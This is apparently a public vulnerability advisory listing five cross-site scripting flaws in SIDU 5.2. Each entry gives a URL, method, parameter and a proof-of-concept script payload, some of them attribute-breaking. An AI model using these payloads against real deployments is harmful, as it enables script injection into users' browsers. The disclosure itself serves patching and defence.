SIDU version 5.2 database web gui suffers from multiple cross site scripting vulnerabilities.
17046758519e64f9aaf9c99b9bb039ed7340842e794d255e19fa81dd9e02a2bd
########################################################################################
# Exploit Title: SIDU 5.2 Database Web GUI Multiple XSS Vulnerabilities
# Date: 04.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://topnew.net/sidu/
# Software Link: https://sourceforge.net/projects/sidu/files/sidu/sidu52.zip
# Version: [app version] 5.2
########################################################################################
XSS details:
########################################################################################
XSS1
URL
http://localhost/sidu52/conn.php
METHOD
Post
PARAMETER
conn[dbs]
PAYLOAD
<script>alert(1)</script>
########################################################################################
XSS2
URL
http://localhost/sidu52/?id=1
METHOD
Post
PARAMETER
sqlcur
PAYLOAD
<script>alert(2)</script>
########################################################################################
XSS3
URL
http://localhost/sidu52/sql.php?id=1&sql=%3Cscript%3Ealert%283%29%3C/script%3E
METHOD
Get
PARAMETER
sql
PAYLOAD
<script>alert(3)</script>
########################################################################################
XSS4
URL
http://localhost/sidu52/user.php?id=1,,,,,,%27%3E%3Cscript%3Ealert%284%29%3C/script%3E
METHOD
Post
PARAMETER
id
PAYLOAD
'><script>alert(4)</script>
########################################################################################
XSS5
URL
http://localhost/sidu52/bChart.php?ses=%3Cscript%3Ealert%285%29%3C/script%3E
METHOD
Post
PARAMETER
id
PAYLOAD
<script>alert(5)</script>
########################################################################################